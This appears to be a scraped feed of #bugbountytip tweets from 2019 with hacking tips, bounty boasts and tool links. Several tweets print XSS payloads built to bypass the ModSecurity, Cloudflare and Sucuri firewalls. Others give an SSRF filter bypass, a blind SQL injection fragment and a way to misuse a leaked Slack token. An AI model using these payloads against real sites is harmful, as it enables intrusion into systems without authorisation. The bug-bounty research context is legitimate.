6 ModSecurity { XSS } Detection Bypass; 🔐 { 1 }; <img src=x:alert(alt) onerror=eval(src) alt='spyerror'> { 2 }; "></tag><svg onload=alert(spyerror)> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-09-01 21:30:41
0 There is no csrf token when changing email.I'm creating csrf poc, and when I try to open poc.html with my other account, I get a "session expired" warning. what is the problem? How can i bypass it? #hackerone #bugcrowd #infosec #BugBounty #bugbountytip #csrf #intigriti
%00Termi
@Elhan65805947


2019-09-01 12:36:25
0 https://t.co/xNc07m02x7 >> campanyname.tld Paste >> https://t.co/NLo3oX2Loz Sometimes you may find upcoming project details, link to invite private meetings, other stuff. Keep on checking regularly. #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-09-01 12:30:19
1 It is not difficult to bypass #XSS filters. Remember that firewall is a stupid device, just edit a simple part of the payload. You can use encoding, tag modifiers, and a lot of other ways like adding some unfamiliar characters or symbols to the payload. #bugbountytip
ak1t4 🇦🇷
@akita_zen


2019-09-01 01:43:09
7 #Bugbountytip: take your time to learn bash, curl & python 🐍 basics scripting. With only a few lines of those you can break anything! Automate your scripts & get the bests PoC’s #bugbounty #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-31 17:22:20
0 how can i redirect xhr login page? If I capture request with burp, web page redirecting other web page. But I can't do it with url? Any idea? #hackerone #bugcrowd #bugbountytip #infosec #redirect #vulnerability
Security Chops
@securitychops


2019-08-31 15:05:31
0 /dev/random - One Liner For Installing Burp Certificate Into Android Nougat and Later #burp #android #BugBounty #bugbountytip https://t.co/BtVxMMy6Jb
sudoka
@sudo_sudoka


2019-08-31 12:17:54
1 CSP can support you to make a #clickjacking possible even when X-Frame-Options: DENY. #bugbounty #bugbountytip https://t.co/AQf5mQk84W
Proxy
@LinuxKodachi


2019-08-31 06:57:10
0 Here is a google dork to find discord servers. 👉 https://t.co/bmVpQAaOgy "keyword" #bugbountytip #OpenSource #osint #Discord
Elhan
@Elhan65805947


2019-08-30 20:09:48
0 A single little dork can give admin access. Site:https://t.co/AUzqSGF92I companyname.tld Bookmark else keep interesting tabs hanging. >> win! #BugBounty #bugbountytip
Mourad
@SecuAudit


2019-08-30 17:30:33
0 I just lost 3000$USD in 2 days trading Forex , definitively Bug Bounty is more profitable and less risky than trading😰 #BugBounty #bugbountytip
Jenish Sojitra
@_jensec


2019-08-30 16:58:57
0 Yay, I was awarded a $1,200 bounty on @Hacker0x01 for tricky privilege escalation ! “ If API endpoint /api/path/ep throwing 401 try to go with /api/path/ep.json “ and it will fetch out json data without checking access control ! #bugbountytip
sagar yadav
@sagaryadav8742


2019-08-30 16:32:42
0 Hotstar swag 😊 Happy to #secure #hotstar #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #bounty #sagaryadav8742 https://t.co/iAgSxeRFre
Cyberthereaper
@Cyberthereaper3


2019-08-30 16:31:00
0 Is have dork for out of band all injection method? #hackerone #bugcrowd #infosec #bugbountytip
intigriti
@intigriti


2019-08-30 14:19:13
2 Thanks for the #BugBountyTip, @securinti! #HackWithIntigriti (P.S.: You are now banned from our live webinars) 👀🚫 https://t.co/z8Cz3rAUgS
sagar yadav
@sagaryadav8742


2019-08-30 13:37:17
0 #redstorm swag #reward and #hof Happy to #secure #redstorm 😊 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter https://t.co/azpBgqAn21
3P1C
@_3P1C


2019-08-30 13:27:03
0 Bypass for SSRF filter Find a subdomain of your target (whitelisted) that resolves to an internal IP Like this internal[.]target[.]com --> 127.0.0.1 #bugbountytips #bugbountytip @intigriti @Bugcrowd @Hacker0x01
Fisher
@Regala_


2019-08-30 09:42:22
2 Yes!! Burp Scope Monitor just reached its 100th⭐!! 🥳🥳 If you haven't used it yet, have a look at https://t.co/2zzgrNvj3G. Currently I'm especially looking for bugs/improvements suggestions so I can work on them later. #bugbounty #bugbountytip #infosec #pentest
Fady Othman
@Fady_Othman


2019-08-30 05:37:29
1 Do you think recording video tutorials using a 21:9 format (Wide Screen) is a good idea? #bugbounty #bugbountytips #bugbountytip
The_unstable
@chaskar_shubham


2019-08-29 13:03:23
0 I rewrote Recce from scratch! It is now faster than the previous version. It can now detect the server. You can write output to a csv file. https://t.co/CGFQHNaA64 check out! #bugbountytips #bugbountytip #bugbounty #InformationSecurity #infosec #infosecurity #hackerone #bugcrowd
Jagannath
@SecurityBoy0x01


2019-08-29 09:56:59
0 [Protip] Passwords using leetspeak are much safer than normal passwords against bruteforce-attacks with word--lists. E.g '53CURI7Y' is much secure than 'Security', when combined with password managers. #bugbountytip #Password #hacking
Cyberthereaper
@Cyberthereaper3


2019-08-28 22:59:14
0 The biggest obstacles that will prevent you in bug bounty programs. Ruby web page Json content-type Akamaighost Cloudfront Cloudflare #BugBounty #hackerone #bugcrowd #intigriti #infosec #bugbountytip
Julien Ahrens
@MrTuxracer


2019-08-28 18:23:55
1 I recently got a maximum bounty for: Reflected XSS -> Grabbed user's identity token (no auth) -> Found auth logic error that converted the token w/o the user's pwd into an auth token -> ATO & 2FA Bypass. Always maximize your impact! #togetherwehitharder #bugbountytip #BugBounty
Yadhavi
@PrincessYadhavi


2019-08-28 16:42:39
0 How much rate you will use to get best results from masscan? (1024 hosts, 5$ digitalocean vps) #bugbounty #bugbountyhelp #bugbountytip #bugbountytips #masscan
Random Robbie
@Random_Robbie


2019-08-28 10:32:27
3 #bugbountytip BUGROBBIE for discount on @binaryedgeio
Cache Bounty @127.0.0.1
@Cache_Bounty


2019-08-28 09:06:40
1 Old but very useful: https://t.co/j1GHbfHNsc #security #bugbountytip #bugbountytips
Michael Eder
@michael_eder_


2019-08-28 08:33:10
1 Authenticated dirbusting 1) Log in w/ Firefox>DevTools>Network>reload page 2) Right click request, "copy curl" 3) rustbuster <your regular rustbuster options> <all -H parameters of the curl command> 4) Profit #infosec #bugbountytip #pentest
kaustubh padwad
@s3curityb3ast


2019-08-28 08:13:39
1 Ever Happen'd this @Hacker0x01 with known guys.. @sagarparmar121 @niksthehacker @stokfredrik @fransrosen @emgeekboy @Parth_Malhotra #bugbountytip #bugbounty @gwendallecoguic #hackerone #bugcrowd @SynackRedTeam is exception for this sharp 24Hrs payout.. ;) Just for Fun #bontyfun https://t.co/wyuV36SLWt
Nihad
@nihad_rekany


2019-08-28 08:09:48
0 Feeling love 🥰🥰 @fbsecurity #bugbountytip #bug https://t.co/Pc9V8CSJuu
Nihad
@nihad_rekany


2019-08-28 08:08:24
0 Thank you @fbsecurity 🥰🥰🥰 #bugbountytip https://t.co/jnggbyDNx8
Neeraj Edwards
@neeraj_sonaniya


2019-08-28 05:29:04
2 Revealing AWS S3 bucket name: step 1: Find any CDN object URL step 2: append following string to after URL: `?AWSAccessKeyId=[Valid_ACCESS_KEY_ID]&Expires=1766972005&Signature=ccc ` and boom it will reveal the bucket name. #BugBounty #security #bugbountytip #bugbountytips https://t.co/JWqGuZLHW4
Ahmed Lekssays
@Lekssays


2019-08-27 22:51:16
0 I made a tool to Extract Open Kibana Instances on Internet and Map them to their Corresponding Organizations using SSL certificates for Bug Bounty Programs. You can check it out: https://t.co/IQQIKdaAaC Happy hunting ;) #bugbounty #bugbountytip
Radek
@radekk


2019-08-27 19:45:52
1 Read how to use Burp Suite with multiple Firefox profiles - https://t.co/xqRPeT8NfC #bugbountytip #bugbounty
Aussan 🇹🇩
@aussan_m


2019-08-27 18:15:36
1 #bugbounty #bugbountytip When you get a bounty try to remember that there are people in need out there...try to give to charities, ... helping companies become secure is great, but helping others is even better.... remember what goes around comes around....
kaustubh padwad
@s3curityb3ast


2019-08-27 16:31:02
0 If you could ever build such complex query and if it returned 404 in "boolean based blind sql injection" AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x21) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x70686f746f73. what will be your reaction... #bugbountytip #ctf
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-27 00:31:48
3 CloudFlare {"HTML TO XSS"}; ~byPass Detected. 📡 [" <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> "] #BugBounty #BugBountyTip #WAF #infosec
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-26 23:48:19
0 CloudFlare {"XSS"}; ~byPass Detected. 📡 <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-26 21:52:05
0 I think one of the pages you hate to open the xss alert box is that it uses the ruby ​​software language. #bugbounty #bugbountytip #hackerone #bugcrowd #infosec #redteam #xss #hacking
Murdockz
@Murdockz_CEH


2019-08-26 17:36:42
0 Created my first "Real" python script that decodes any base64 string...I think lol. Don't judge me it's my first time learning python lol. Check it out. #bugbountytip #bugbountytips #bugbounty https://t.co/rSnsf6BoBb
kaustubh padwad
@s3curityb3ast


2019-08-26 17:19:32
0 This is how I learn SQL Injection Now a days... #rofl #ctf #SQL #injection #bugbountytip #wireshark #hackerone #AppSec but I can imagine how tough is this to exploit, since sqlmap is taking too much time now its 2+ Hours with --dump-all... :) https://t.co/t1G0qtaNQh
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-08-26 16:50:20
0 Regexp trying detect Open redirect in response for burp #bugbountytips #bugbountytip https://t.co/LTbegfJf77
Murdockz
@Murdockz_CEH


2019-08-26 09:48:23
1 My first bug crowd P1. API Keys, Firebase Tokens, Account username and password. Recon wins. #BugBounty #bugbountytip #bugbountytip https://t.co/K6C0mnajQH
Hussein Daher
@HusseiN98D


2019-08-25 14:31:51
10 As per the vote results, here you go! A cool XXE resulting from a SSRF found on local company website during a pentest. DMs are open, retweet and like if you love this style of PoC! 😎 #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/XbwBLdYO33
gautam bhatia
@gautambhatia57


2019-08-25 11:14:23
0 Thanks a lot @defcon @DCG91135 @Bugcrowd @lab401 @infosecgirls @hackthebox_eu @PortSwigger for amazing workshop at DIT University #infosec #security #reversing #bugbountytip #rfid https://t.co/wqtmwLM4y9
Arif Khan
@payloadartist


2019-08-24 14:17:36
2 Another awesome research by a god of websec @filedescriptor: The Cookie monster in your browsers https://t.co/x051kiyWgJ #BugBounty #BugBountyTip
Hussein Daher
@HusseiN98D


2019-08-24 13:52:55
1 My next #bugbountytip PoC (check my Twitter for a preview of the old ones) should talk about: #bugbounty
Yogendra Jaiswal
@vulnh0lic


2019-08-24 13:28:31
17 Just Published article of [iOS Application Security] Jailbreak 12.4 and SSL pinning bypass | How to set up your iOS Testing Lab https://t.co/kVAs20V8dC #infosec #bugbountytip #sslbypass #jailbreak #iOS124 #unc0ver Thanks, @prateek_0490 and @Yassineaboukir @jpjaypatel34
Andri Wahyudi 🕊️
@andripwn


2019-08-24 11:25:33
1 Time US : 10:00 Time ID : 21:00 Bug Bounty Live! basic #recon , VulnerabilityAnalysis #shodan Live at : https://t.co/QdsrDoweOQ Follow Live streams and share... #BugBounty #bugbountytips #bugbountytip #hackerone #bugcrowd
Raihan Biswas 🇹🇼
@zapstiko


2019-08-24 05:01:29
3 Sucuri {` XSS ´}; payloads `appeared fresh, confirmed.´ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Vitthal Shinde
@0_1VitthalS


2019-08-24 04:11:48
1 If you found a hardcoded slack token, you can use it to get invitation to slack group. https://t.co/OMxs8QFVjQ<slack_token>&channel=CL0KQ4SK1&user=<email>&pretty=1 #BugBountyTip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-23 06:41:14
1 Sucuri {` XSS ´}; payloads `appeared fresh, confirmed.´ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Uranium238
@uraniumhacker


2019-08-22 18:02:56
1 Have your tools exporting stuff as JSON? use Panda to export it as a .db file. You can then use client side js to parse the db and query through it. #bugbountytip
contra_security
@security_contra


2019-08-22 17:46:16
0 Analysis of Ruby rest-client 1.6.13 backdoor https://t.co/KGSXYpw68B @snyksec #owasp #backdoor #ruby #appsec #bugbountytip
m0z
@LooseSecurity


2019-08-22 16:47:55
6 file.php?url=/admin/ Redirects to: https://t.co/xsJrSUcfgM Put URL [email protected] Now it is